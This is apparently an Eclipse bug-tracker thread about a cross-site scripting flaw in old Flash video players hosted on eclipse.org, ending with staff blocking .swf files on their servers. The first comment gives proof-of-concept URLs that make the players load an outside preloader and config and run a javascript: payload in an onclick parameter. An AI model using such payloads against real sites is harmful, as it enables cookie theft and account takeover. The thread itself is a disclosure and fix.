Community
Participate
Working Groups
http://archive.eclipse.org/eclipse/screencasts/incubator/dom-binding_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf http://www.eclipse.org/sapphire/samples/jee/demo-1/WebApplicationConfigurationEditorDemo_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf http://www.eclipse.org/emf/compare/doc/features/videos/Papyrus/EMFComparePapyrus_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf http://www.eclipse.org/intent/pages/transcripts/2012_AgileALMConnect/demos/demo2_validation/validation_controller.swf?csPreloader=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_preload.swf&csConfigFile=http://appsec.ws/ExploitDB/Configs/Camtasia/PoC_config.xml&.swf http://www.eclipse.org/atf/flash/flashFiles/player_flv_maxi.swf?flv=http://flv-player.net/medias/KyodaiNoGilga.flv&startimage=http://appsec.ws/ExploitDB/cMon.jpg&onclicktarget=_self&onclick=javascript:confirm(%27Your%20cookies%20and%20authentication%20have%20been%20captured%20and%20an%20attacker%20now%20owns%20your%20account%20and%20all%20your%20information.%27);&ondoubleclick=http://www.google.com&.swf
This look like an old vulnerability: http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2008-January/003417.html We should probably remove all instances of this flash player from our servers and transfer the videos to youtube. I believe the video player was created by TechSmith: http://www.techsmith.com/
> We should probably remove all instances of this flash player from our > servers and transfer the videos to youtube. Since it involves a bunch of projects, I'd go even further: we simply block the ".swf" extension on www.eclipse.org Would that cause anything else to blow up?
(In reply to Denis Roy from comment #2) > > We should probably remove all instances of this flash player from our > > servers and transfer the videos to youtube. > > Since it involves a bunch of projects, I'd go even further: we simply block > the ".swf" extension on www.eclipse.org > > Would that cause anything else to blow up? +1 I think it's a good idea for us to stop supporting Flash. We should probably do a quick search to see what exactly we are going to break.
(In reply to Denis Roy from comment #2) > Since it involves a bunch of projects, I'd go even further: we simply block > the ".swf" extension on www.eclipse.org +1
> find . -type f -name '*.swf' | sort | sed -e 's/^.\///' | awk -F/ '{print $1 "/" $2}' | uniq -c 14 ajdt/demos 1 articles/Article-Accessibility351 3 articles/Article-Authoring-With-Eclipse 12 atf/demos 6 atf/flash 1 atl/usecases 1 atl/videos 5 bpmn2-modeler/videos 1 cdt/movies 2 eclipse.org-common/yui 5 eef/videos 14 emf/compare 15 epsilon/cinema 2 equinox/documents 2 europa/images 2 gmt/modisco 1 gyrex/screencasts 14 intent/pages 4 jubula/script 6 jwt/press 2 modeling/emf 5 modeling/emft 12 modeling/gmp 3 modeling/mdt 8 modeling/presentations 8 mylyn/doc 1 nebula/widgets 28 org/june05release 1 org/press-release 1 papyrus/updates 2 papyrus/videos 1 projects/dev_process 1 recommenders/assets 3 sapphire/samples 5 swt/e4 34 tptp/home 4 tptp/performance 1 tptp/platform 3 tptp/test 1 webtools/community 8 webtools/dali 3 webtools/phoenix
FWIW, the "copy to clipboard" functionality provided by Gerrit uses SWF.
I'd like to pretend that active projects that include third-party tools ship up-to-date versions that are not vulnerable. Maybe that is naïve. I'm planning on including a short communiqué about this to committers tomorrow.
I've added the restriction to www.eclipse.org I'll also add it to download.eclipse.org and archive.eclipse.org and I think we'll be done.
> I'll also add it to download.eclipse.org and archive.eclipse.org and I think > we'll be done. Done and done. Closing. Thanks for the report.